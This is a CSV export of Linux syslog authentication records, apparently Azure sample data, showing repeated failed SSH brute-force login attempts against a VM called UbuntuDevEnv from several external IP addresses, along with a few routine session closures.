+8651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:57,UbuntuDevEnv,2019-06-25 21:44:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:57,UbuntuDevEnv,2019-06-25 21:44:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,20487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:58,UbuntuDevEnv,2019-06-25 21:44:57,auth,UbuntuDevEnv,info,Invalid user recepcion from 165.22.96.224 port 47162,20541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,recepcion,165.22.96.2,47162,,
+8654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:58,UbuntuDevEnv,2019-06-25 21:44:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,20541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:58,UbuntuDevEnv,2019-06-25 21:44:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:59,UbuntuDevEnv,2019-06-25 21:44:58,auth,UbuntuDevEnv,info,Failed password for invalid user nue from 134.209.233.74 port 41332 ssh2,20487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nue,134.209.233.7,41332,,
+8657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:59,UbuntuDevEnv,2019-06-25 21:44:58,auth,UbuntuDevEnv,info,Disconnected from invalid user nue 134.209.233.74 port 41332 [preauth],20487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nue,134.209.233.7,41332,,
+8658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:59,UbuntuDevEnv,2019-06-25 21:44:58,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 41332:11: Bye Bye [preauth],20487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,41332,,
+8659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:45:00,UbuntuDevEnv,2019-06-25 21:44:59,auth,UbuntuDevEnv,info,Failed password for invalid user recepcion from 165.22.96.224 port 47162 ssh2,20541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,recepcion,165.22.96.2,47162,,
+8660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:45:00,UbuntuDevEnv,2019-06-25 21:45:00,auth,UbuntuDevEnv,info,Disconnected from invalid user recepcion 165.22.96.224 port 47162 [preauth],20541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,recepcion,165.22.96.2,47162,,
+8661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:45:00,UbuntuDevEnv,2019-06-25 21:45:00,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 47162:11: Bye Bye [preauth],20541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,47162,,
+8662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:18,UbuntuDevEnv,2019-06-25 21:46:18,auth,UbuntuDevEnv,info,Invalid user site from 134.209.233.74 port 58390,35706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,site,134.209.233.7,58390,,
+8663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:18,UbuntuDevEnv,2019-06-25 21:46:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,35706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:18,UbuntuDevEnv,2019-06-25 21:46:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:20,UbuntuDevEnv,2019-06-25 21:46:20,auth,UbuntuDevEnv,info,Failed password for invalid user site from 134.209.233.74 port 58390 ssh2,35706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,site,134.209.233.7,58390,,
+8666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:20,UbuntuDevEnv,2019-06-25 21:46:20,auth,UbuntuDevEnv,info,Disconnected from invalid user site 134.209.233.74 port 58390 [preauth],35706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,site,134.209.233.7,58390,,
+8667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:20,UbuntuDevEnv,2019-06-25 21:46:20,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 58390:11: Bye Bye [preauth],35706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,58390,,
+8668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:41,UbuntuDevEnv,2019-06-25 21:46:41,auth,UbuntuDevEnv,info,Invalid user jesus from 165.22.96.224 port 37330,35826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,165.22.96.2,37330,,
+8669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:41,UbuntuDevEnv,2019-06-25 21:46:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:41,UbuntuDevEnv,2019-06-25 21:46:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,35826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:44,UbuntuDevEnv,2019-06-25 21:46:43,auth,UbuntuDevEnv,info,Failed password for invalid user jesus from 165.22.96.224 port 37330 ssh2,35826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,165.22.96.2,37330,,
+8672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:44,UbuntuDevEnv,2019-06-25 21:46:43,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 37330:11: Bye Bye [preauth],35826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,37330,,
+8673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:46:44,UbuntuDevEnv,2019-06-25 21:46:43,auth,UbuntuDevEnv,info,Disconnected from invalid user jesus 165.22.96.224 port 37330 [preauth],35826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,165.22.96.2,37330,,
+8674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:47:43,UbuntuDevEnv,2019-06-25 21:47:42,auth,UbuntuDevEnv,info,Invalid user ming from 134.209.233.74 port 47216,36042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ming,134.209.233.7,47216,,
+8675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:47:43,UbuntuDevEnv,2019-06-25 21:47:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:47:43,UbuntuDevEnv,2019-06-25 21:47:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,36042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:47:45,UbuntuDevEnv,2019-06-25 21:47:45,auth,UbuntuDevEnv,info,Failed password for invalid user ming from 134.209.233.74 port 47216 ssh2,36042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ming,134.209.233.7,47216,,
+8678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:47:45,UbuntuDevEnv,2019-06-25 21:47:45,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 47216:11: Bye Bye [preauth],36042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,47216,,
+8679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:47:45,UbuntuDevEnv,2019-06-25 21:47:45,auth,UbuntuDevEnv,info,Disconnected from invalid user ming 134.209.233.74 port 47216 [preauth],36042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ming,134.209.233.7,47216,,
+8680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:19,UbuntuDevEnv,2019-06-25 21:48:19,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,12415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+8681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:19,UbuntuDevEnv,2019-06-25 21:48:19,auth,UbuntuDevEnv,info,Removed session 50.,1161,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:19,UbuntuDevEnv,2019-06-25 21:48:19,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,12512,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+8683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:19,UbuntuDevEnv,2019-06-25 21:48:19,auth,UbuntuDevEnv,info,Removed session 52.,1161,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:26,UbuntuDevEnv,2019-06-25 21:48:26,auth,UbuntuDevEnv,info,Invalid user developer from 165.22.96.224 port 55962,36207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,165.22.96.2,55962,,
+8685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:26,UbuntuDevEnv,2019-06-25 21:48:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:26,UbuntuDevEnv,2019-06-25 21:48:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,36207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:28,UbuntuDevEnv,2019-06-25 21:48:28,auth,UbuntuDevEnv,info,Failed password for invalid user developer from 165.22.96.224 port 55962 ssh2,36207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,165.22.96.2,55962,,
+8688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:28,UbuntuDevEnv,2019-06-25 21:48:28,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 55962:11: Bye Bye [preauth],36207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,55962,,
+8689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:48:28,UbuntuDevEnv,2019-06-25 21:48:28,auth,UbuntuDevEnv,info,Disconnected from invalid user developer 165.22.96.224 port 55962 [preauth],36207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,165.22.96.2,55962,,
+8690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:49:13,UbuntuDevEnv,2019-06-25 21:49:12,auth,UbuntuDevEnv,info,Invalid user avendoria from 134.209.233.74 port 36042,36376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avendoria,134.209.233.7,36042,,
+8691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:49:13,UbuntuDevEnv,2019-06-25 21:49:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:49:13,UbuntuDevEnv,2019-06-25 21:49:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,36376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:49:15,UbuntuDevEnv,2019-06-25 21:49:15,auth,UbuntuDevEnv,info,Failed password for invalid user avendoria from 134.209.233.74 port 36042 ssh2,36376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avendoria,134.209.233.7,36042,,
+8694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:49:15,UbuntuDevEnv,2019-06-25 21:49:15,auth,UbuntuDevEnv,info,Disconnected from invalid user avendoria 134.209.233.74 port 36042 [preauth],36376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avendoria,134.209.233.7,36042,,
+8695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:49:15,UbuntuDevEnv,2019-06-25 21:49:15,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 36042:11: Bye Bye [preauth],36376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,36042,,
+8696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:10,UbuntuDevEnv,2019-06-25 21:50:10,auth,UbuntuDevEnv,info,Invalid user shao from 165.22.96.224 port 46114,36577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shao,165.22.96.2,46114,,
+8697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:10,UbuntuDevEnv,2019-06-25 21:50:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:10,UbuntuDevEnv,2019-06-25 21:50:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,36577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:12,UbuntuDevEnv,2019-06-25 21:50:11,auth,UbuntuDevEnv,info,Failed password for invalid user shao from 165.22.96.224 port 46114 ssh2,36577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shao,165.22.96.2,46114,,
+8700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:12,UbuntuDevEnv,2019-06-25 21:50:11,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 46114:11: Bye Bye [preauth],36577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,46114,,
+8701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:12,UbuntuDevEnv,2019-06-25 21:50:11,auth,UbuntuDevEnv,info,Disconnected from invalid user shao 165.22.96.224 port 46114 [preauth],36577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shao,165.22.96.2,46114,,
+8702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:39,UbuntuDevEnv,2019-06-25 21:50:39,auth,UbuntuDevEnv,info,Invalid user diamond from 134.209.233.74 port 53100,36681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diamond,134.209.233.7,53100,,
+8703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:39,UbuntuDevEnv,2019-06-25 21:50:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:39,UbuntuDevEnv,2019-06-25 21:50:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,36681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:42,UbuntuDevEnv,2019-06-25 21:50:41,auth,UbuntuDevEnv,info,Failed password for invalid user diamond from 134.209.233.74 port 53100 ssh2,36681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diamond,134.209.233.7,53100,,
+8706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:42,UbuntuDevEnv,2019-06-25 21:50:41,auth,UbuntuDevEnv,info,Disconnected from invalid user diamond 134.209.233.74 port 53100 [preauth],36681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diamond,134.209.233.7,53100,,
+8707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:50:42,UbuntuDevEnv,2019-06-25 21:50:41,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 53100:11: Bye Bye [preauth],36681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,53100,,
+8708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:43,UbuntuDevEnv,2019-06-25 21:51:42,auth,UbuntuDevEnv,info,Invalid user keiv from 212.156.136.114 port 48669,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,keiv,212.156.136.1,48669,,
+8709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:43,UbuntuDevEnv,2019-06-25 21:51:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:43,UbuntuDevEnv,2019-06-25 21:51:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
